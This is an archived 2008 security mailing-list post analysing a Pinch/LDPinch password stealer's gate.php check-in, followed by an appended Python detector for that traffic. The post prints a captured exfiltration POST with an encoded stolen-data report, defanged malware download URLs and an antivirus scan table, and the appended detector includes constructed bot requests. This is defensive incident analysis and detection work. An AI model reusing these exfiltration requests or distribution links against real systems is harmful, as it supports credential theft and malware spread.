[nsp-sec] 212.43.241.106 in the daily reports

Tom Fischer tfischer at bfk.de
Mon Feb 25 07:38:46 EST 2008


Hi,

On Mon, Feb 25, 2008 at 11:51:04AM +0000, David Freedman wrote:
> ~ Your daily reports flagged 212.43.241.106 as a botnet controller with
> the URL http://www.winfleet.fr/fr/gate.php,
> I've been told the following by our systems dept:
> "The ip 212.43.241.106 is the virtual ip of our mutualized hosting.
> The script gate.php sends a mail directly or from a file
> with information of customers' GPS location of trucks.
> This script seems to be very normal.
> Can we get this removed from the reports as a false positive?

hmmm, imho that is not a false positive 

--communication excerpt--
POST /fr/gate.php HTTP/1.0
Host: www.winfleet.fr
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)
Content-Length: 4152

a=asd at timeparty.org&b=my_report&d=report.bin&c=UDNNTAAAAADiCAAAEQAAAAAAAAAIAAAAFwofMTDkeQkSAAAAAAAA
[...]

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
  <head>
    <title>ret_ok</title>
  </head>
  <body>
  </body>
</html>
--end of excerpt--

That's a typical Pinch/Pincher communication and response (ret_ok)!

Stolen data includes e.g. Windows licence keys, FTP accounts, ...

Malware distribution (exploit site):
hxxp://biyomedikalse.com/modules/prime/prime/ 
Sample:
hxxp://biyomedikalse.com/modules/prime/prime/exe.php 

============================================================

Scan report of (MD5): 85cadda49fce0b612c4956df4e818c74

Engine	Detection ("-" = not detected)
@Proventia-VPS	-
AntiVir	DR/Delphi.Gen
Avast!	-
AVG	-
BitDefender	Trojan.Dropper.LDPinch.Q
ClamAV	-
Command	-
Dr Web	Trojan.PWS.LDPinch.1941
eSafe	-
eTrust-VET	-
eTrust-VET (BETA)	-
Ewido	-
F-Prot	-
F-Secure	-
F-Secure (BETA)	-
Fortinet	-
Fortinet (BETA)	-
Ikarus	Virus.Win32.Zapchast.DA
Kaspersky	-
McAfee	-
McAfee (BETA)	-
Microsoft	VirTool:Win32/DelfInject.gen!AA
Nod32	Win32/TrojanDropper.Agent.NIF trojan (variant)
Norman	-
Panda	-
Panda (BETA)	-
QuickHeal	-
Rising	Trojan.DL.Win32.Agent.bxw
Sophos	Mal/EncPk-CM
Sunbelt	-
Symantec	-
Symantec (BETA)	-
Trend Micro	-
Trend Micro (BETA)	-
VBA32	-
VirusBuster	Trojan.Delfinject.Gen
WebWasher	Trojan.Dropper.Delphi.Gen
YY_A-Squared	-
YY_Spybot	Worldsecurityonline.FakeAlert,,Executable

-- 
Tom Fischer
BFK edv-consulting GmbH                  tel: +49 721 962 01-1
Kriegsstr. 100, D-76133 Karlsruhe        fax: +49 721 962 01-99
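For anyone who wants to turn the excerpt above into a check rather than eyeballing it, here is an added example (my own code, not from the post, from BFK or from any AV vendor) that scores a raw HTTP request against the Pinch/Pincher gate pattern shown above and recognises the ret_ok reply. Every indicator it looks for is taken from that single captured exchange: a POST to a path ending in gate.php, form-urlencoded body, the four fields a/b/c/d, an e-mail address in a=, d=report.bin, and the bytes "P3ML" that the base64 in c= decodes to. Whether other Pinch builds use the same field names or the same header is an assumption, so the score is a triage hint, not proof. The sample traffic is constructed: the archive rewrote the drop address as "asd at timeparty.org", a real bot sends an "@" (URL-encoded %40), and the report blob here is synthetic apart from its P3ML header.

```python
"""Heuristic detector for Pinch/LDPinch gate.php check-ins and the ret_ok
acknowledgement, exercised on constructed request/response samples.

Added example; not code from the nsp-sec post. Indicator names, the
report.bin file name, the P3ML header and the ret_ok title come from the
one exchange quoted in the thread and are assumed to hold for other builds."""
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

REPORT_MAGIC = b"P3ML"   # what the excerpt's base64 c= field decodes to (assumed stable)
ACK_TITLE_RE = re.compile(rb"<title>\s*ret_ok\s*</title>", re.I)
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def split_http(raw: bytes):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:                                   # tolerate bare-LF captures
        head, _, body = raw.partition(b"\n\n")
    lines = head.decode("latin-1").splitlines()
    start = lines[0] if lines else ""
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return start, headers, body


def pinch_indicators(raw_request: bytes) -> list:
    """Return the names of Pinch gate indicators present in one HTTP request."""
    start, headers, body = split_http(raw_request)
    hits = []
    parts = start.split()
    if len(parts) >= 2 and parts[0] == "POST" and \
            urlsplit(parts[1]).path.lower().endswith("/gate.php"):
        hits.append("post_to_gate_php")
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        hits.append("form_urlencoded")
    form = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    if all(k in form for k in ("a", "b", "c", "d")):
        hits.append("fields_abcd")
    if EMAIL_RE.match(form.get("a", [""])[0]):
        hits.append("a_is_email")                 # drop address for the stolen data
    if form.get("d", [""])[0].lower() == "report.bin":
        hits.append("d_is_report_bin")
    # parse_qs turns a raw "+" into a space; base64 uses "+", so undo that first.
    c_field = form.get("c", [""])[0].replace(" ", "+")
    try:
        blob = base64.b64decode(c_field, validate=True)
    except (binascii.Error, ValueError):
        blob = b""
    if blob.startswith(REPORT_MAGIC):
        hits.append("c_has_p3ml_header")
    return hits


def is_pinch(raw_request: bytes, min_hits: int = 4) -> bool:
    """Verdict: enough independent indicators to flag the request for review."""
    return len(pinch_indicators(raw_request)) >= min_hits


def is_pinch_ack(raw_response: bytes) -> bool:
    """True if the server reply carries the ret_ok title seen in the excerpt."""
    _, _, body = split_http(raw_response)
    return ACK_TITLE_RE.search(body) is not None


# Constructed samples modelled on the excerpt (not the captured bytes themselves).
SAMPLE_BLOB = base64.b64encode(REPORT_MAGIC + bytes(20)).decode()   # synthetic body
SAMPLE_BODY = "a=asd%40timeparty.org&b=my_report&d=report.bin&c=" + SAMPLE_BLOB
SAMPLE_REQUEST = (
    "POST /fr/gate.php HTTP/1.0\r\n"
    "Host: www.winfleet.fr\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Connection: Keep-Alive\r\n"
    "Pragma: no-cache\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    f"Content-Length: {len(SAMPLE_BODY)}\r\n\r\n" + SAMPLE_BODY
).encode("latin-1")
SAMPLE_RESPONSE = (
    b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
    b"<html><head><title>ret_ok</title></head><body></body></html>"
)
# A plausible benign post to a script of the same name (hypothetical truck report).
BENIGN_REQUEST = (
    b"POST /fr/gate.php HTTP/1.0\r\nHost: www.winfleet.fr\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"truck=42&lat=48.85&lon=2.35"
)

if __name__ == "__main__":
    print(pinch_indicators(SAMPLE_REQUEST), is_pinch(SAMPLE_REQUEST))
    print(pinch_indicators(BENIGN_REQUEST), is_pinch(BENIGN_REQUEST))
    print("ack:", is_pinch_ack(SAMPLE_RESPONSE))
```

The point of scoring several indicators rather than matching on the script name alone is exactly the dispute in this thread: a hosting customer can legitimately own a gate.php, and the benign truck-report post scores only two hits, while the bot check-in scores all six and is answered with ret_ok.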


